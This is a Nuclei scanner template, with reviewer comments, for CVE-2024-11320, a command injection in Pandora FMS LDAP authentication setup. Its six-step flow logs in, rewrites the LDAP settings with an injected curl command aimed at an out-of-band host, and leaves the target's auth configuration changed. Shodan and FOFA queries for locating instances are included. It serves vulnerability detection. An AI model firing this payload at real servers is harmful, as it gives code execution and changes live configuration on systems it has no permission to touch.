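# Nuclei template for CVE-2024-11320: authenticated command injection in the
# Pandora FMS LDAP authentication setup (CWE-77). The flow logs in with the
# supplied {{username}}/{{password}}, rewrites the LDAP settings under
# godmode/setup/setup (section=auth) with a payload in ldap_admin_login, and
# confirms execution through an out-of-band DNS interaction ({{interactsh-url}}).
#
# Reviewer notes:
# - The extracted copy of this template had the `&section=auth` query parameter
#   rendered as `§ion=auth` (HTML entity `&sect;` decoded) in steps 4 and 5 and
#   in the Referer header; it is restored to `&section=auth` here.
# - Step 5 changes the target's live authentication configuration (auth=ldap,
#   fallback_local_auth=1, ldap_server=localhost, ...) and no later request in
#   this template restores the previous values; running it against a real
#   instance leaves that configuration modified.
# - classification.cvss-metrics states PR:N, but both the impact text and the
#   flow itself require valid credentials (step 2 logs in); the 9.8 score is
#   kept as the upstream value, not as a claim that the flow is unauthenticated.
# - Detection: POST requests to index.php with sec2=godmode/setup/setup and
#   section=auth whose ldap_admin_login contains shell metacharacters, plus
#   unexpected outbound DNS/HTTP from the Pandora FMS host after a setup change.
# - Mitigation: upgrade to 777.5 or later (see info.remediation).

id: CVE-2024-11320

info:
  name: Pandora v7.0NG.777.3 - Remote Code Execution
  author: DhiyaneshDK,Shubham Rooter,pdresearch,iamnoooob
  severity: critical
  description: |
    Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through <=777.4
  impact: |
    Authenticated attackers can execute arbitrary commands via command injection in the LDAP authentication mechanism, leading to complete system compromise.
  remediation: |
    Upgrade Pandora FMS to version 777.5 or later.
  reference:
    - https://github.com/mhaskar/CVE-2024-11320
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11320
  classification:
    # PR:N here disagrees with the authenticated flow below; value kept as-is.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11320
    cwe-id: CWE-77
    epss-score: 0.92623
    epss-percentile: 0.99758
    cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    vendor: pandorafms
    product: pandora_fms
    shodan-query:
      - http.html:"pandora fms - installation wizard"
      - http.title:"pandora fms"
    fofa-query:
      - body="pandora fms - installation wizard"
      - title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2024,oast,rce,pandora,fms,vuln

# All six steps must succeed in order; steps 1-5 are internal (no match is
# reported by themselves), only the OOB check in step 6 produces the finding.
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

http:
  # Step 1: fetch the login page and extract the CSRF token for the login form.
  - raw:
      - |
        GET /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_code
        group: 1
        regex:
          - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
        internal: true

  # Step 2: authenticate with the caller-supplied credentials; success is a
  # 302 that sets PHPSESSID.
  - raw:
      - |
        POST /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'PHPSESSID=')
        condition: and
        internal: true

  # Step 3: confirm the session is valid by loading the post-login dashboard.
  - raw:
      - |
        GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'Server health')
        condition: and
        internal: true

  # Step 4: open the authentication setup page (requires an account that can
  # reach godmode) and extract the CSRF token for the settings form.
  - raw:
      - |
        GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_code2
        group: 1
        regex:
          - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, 'Authentication method', 'LDAP')
        condition: and
        internal: true

  # Step 5: save the LDAP settings with the injected ldap_admin_login value.
  # This persists auth=ldap with local fallback on the target; the setup is
  # not reverted by any later step.
  - raw:
      - |
        POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup&section=auth
        Content-Type: application/x-www-form-urlencoded

        update_config=1&csrf_code={{csrf_code2}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3bcurl%20xxxxzz.{{interactsh-url}}%20%23&ldap_admin_pass=&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,'Correctly updated the setup options')
        condition: and
        internal: true

  # Step 6: a fresh, cookie-less request to the login page triggers the LDAP
  # authentication path; the finding is the resulting DNS interaction.
  - raw:
      - |
        GET /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}

    disable-cookie: true

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

# NOTE(review): the digest below was produced for the original template text;
# after the edits above it is not expected to validate and the template would
# need re-signing by the template maintainers.
# digest: 4a0a00473045022078c18d3dd82946e90ea441328338b757bed7d0a0b945381eeec936a742cbcc5d022100f9ca48d05985889bc4afb80f8c3e5381cd82b4f4a8b9f605c4583f3d819648c5:922c64590222798bb761d5b6d8e72950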